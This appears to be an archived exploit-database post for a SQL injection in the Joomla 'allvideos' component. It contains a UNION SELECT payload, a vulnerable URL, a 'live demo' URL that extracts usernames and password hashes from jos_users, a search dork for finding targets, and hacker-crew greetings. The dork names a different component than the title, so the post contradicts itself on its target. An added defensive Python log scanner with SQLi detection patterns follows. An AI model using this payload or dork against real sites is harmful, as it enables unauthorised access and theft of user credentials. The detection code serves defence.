Joomla! Component allvideos – Blind SQL Injection

  • Author: bumble_be
    Date: 2010-04-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12137/
  • # Exploit Title: joomla component allvideos BLIND SQL injection Vulnerability 
    # Date: 09 april 2010
    # Author: bumble_be
    # Software Link: N/A
    # Tested on: Windows XP 2
    
    ======================================================================
    [x] author : bumble_be (iogi89@ymail.com)
    [x] dork : inurl:option=com_huruhelpdesk
    [x] myweb: http://linggau-haxor.com
    ======================================================================
    
    ==== SQLI EXPLOIT ====
    /**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12--
    
    
    
    ==== VULN IN HERE ====
    
    http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339[c0de]
    
    
    
    ==== LIVE DEMO ====
    
    http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users--
    
    
    [x]-------------------------------------------------------------------
    
    GREETZ TO WE FORUM:
    DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID
    
    [x]-------------------------------------------------------------------
    
    MY BROTHA :
    mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
    eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :)
    
    [x]-------------------------------------------------------------------
    
    note: begin everything by saying bismillah
    
    [X]-------------------------------------------------------------------
    INDONESIA STILL UP AND WE NOT DEAD :0
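
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans access-log lines for `option=com_allvideos` requests whose `id` is not a plain integer, undoing URL encoding and collapsing `/**/` comments before matching. The log lines, function names and token list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# /**/ comments stand in for spaces in the advisory's payload; collapse them first.
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SQLI_TOKENS = re.compile(r"\b(?:union\s+(?:all\s+)?select|(?:and|or)\s+\d+\s*=\s*\d+)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return 'ignore', 'ok', 'malformed' or 'sqli' for one request URL."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if params.get("option", [""])[0].lower() != "com_allvideos":
        return "ignore"
    verdict = "ok"
    for raw in params.get("id", []):          # parse_qs already decoded %xx and '+'
        if re.fullmatch(r"[0-9]+", raw):
            continue                          # a plain integer id is the only expected shape
        normalized = SQL_COMMENT.sub(" ", raw)
        if SQLI_TOKENS.search(normalized):
            return "sqli"
        verdict = "malformed"
    return verdict

def scan(log_lines):
    """Return (line_number, client, verdict) for every suspicious com_allvideos request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        verdict = classify(m.group(1))
        if verdict in ("sqli", "malformed"):
            hits.append((n, line.split(" ", 1)[0], verdict))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_allvideos&id=1339 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Apr/2010:10:00:05 +0000] "GET /index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3-- HTTP/1.1" 200 4875',
    '198.51.100.7 - - [10/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_allvideos&id=1339%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 4875',
    '203.0.113.4 - - [10/Apr/2010:10:00:12 +0000] "GET /index.php?option=com_allvideos&id=1339abc HTTP/1.1" 200 5120',
    '203.0.113.4 - - [10/Apr/2010:10:00:15 +0000] "GET /index.php?option=com_content&id=7 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only test on `id`, applied in the component before the value reaches the query, is what closes the hole; the log scan only surfaces attempts.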